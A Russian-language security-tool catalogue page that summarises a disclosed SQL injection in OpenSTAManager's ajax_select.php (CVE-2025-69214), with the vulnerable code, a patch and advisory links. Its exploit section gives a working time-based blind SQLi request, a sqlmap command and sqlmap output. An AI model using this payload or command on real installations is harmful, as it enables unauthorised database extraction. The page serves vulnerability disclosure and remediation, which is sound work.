Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-69214 — Концептуальное доказательство для CVE-2025-69214: SQL-инъекция в конечной точке ajax_select.php компонента OpenSTAManager. Включает анализ уязвимого кода, эксплуатацию слепой временной инъекции с помощью SQLMap и рекомендации по устранению. | Kitploit
Инструменты/GitHubGitHub/lukasz-rybak/cve-2025-69214
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз Данных
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

Концептуальное доказательство для CVE-2025-69214: SQL-инъекция в конечной точке ajax_select.php компонента OpenSTAManager. Включает анализ уязвимого кода, эксплуатацию слепой временной инъекции с помощью SQLMap и рекомендации по устранению.

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-69214: OpenSTAManager: SQL-инъекция в ajax_select.php (endpoint componenti)

Обзор

ПолеДетали
CVE IDCVE-2025-69214
SeverityВЫСОКИЙ
AdvisoryПосмотреть рекомендацию
ОбнаруженоLukasz Rybak

Затронутые продукты

  • devcode-it/openstamanager (версии: <= 2.9.8)

Классификация CWE

  • CWE-89: Неправильная нейтрализация специальных элементов, используемых в SQL-команде ('SQL Injection')

Подробности

Краткое описание

Уязвимость SQL-инъекции существует в конечной точке ajax_select.php при обработке операции componenti. Аутентифицированный злоумышленник может внедрить вредоносный SQL-код через параметр options[matricola].

Подтверждение концепции

Уязвимый код

Файл: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Поток данных

  1. Источник: $_GET['options']['matricola'] → $superselect['matricola']
  2. Уязвимость: Ввод пользователя напрямую конкатенируется в выражение IN() без санитизации
  3. Сток: Запрос выполняется через AJAX-фреймворк

Эксплойт

Ручной PoC (Time-based Blind SQLi):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
изображение

Эксплуатация с помощью SQLMap:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

Вывод SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
изображение

Воздействие

  • Утечка данных: Time-based blind SQL-инъекция позволяет полное извлечение базы данных
  • Обход аутентификации: Доступ к конфиденциальным данным компонентов и оборудования
  • Манипуляция данными: Возможность несанкционированного изменения записей

Исправление

Приводите значения к целым числам перед использованием в SQL:

До:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

После:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

Автор

Обнаружено: Łukasz Rybak

Ссылки

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

Отказ от ответственности

Этот CVE был ответственно раскрыт в соответствии с практиками координированного раскрытия уязвимостей. Приведенная здесь информация предназначена только для образовательных и защитных целей.

Скачать инструмент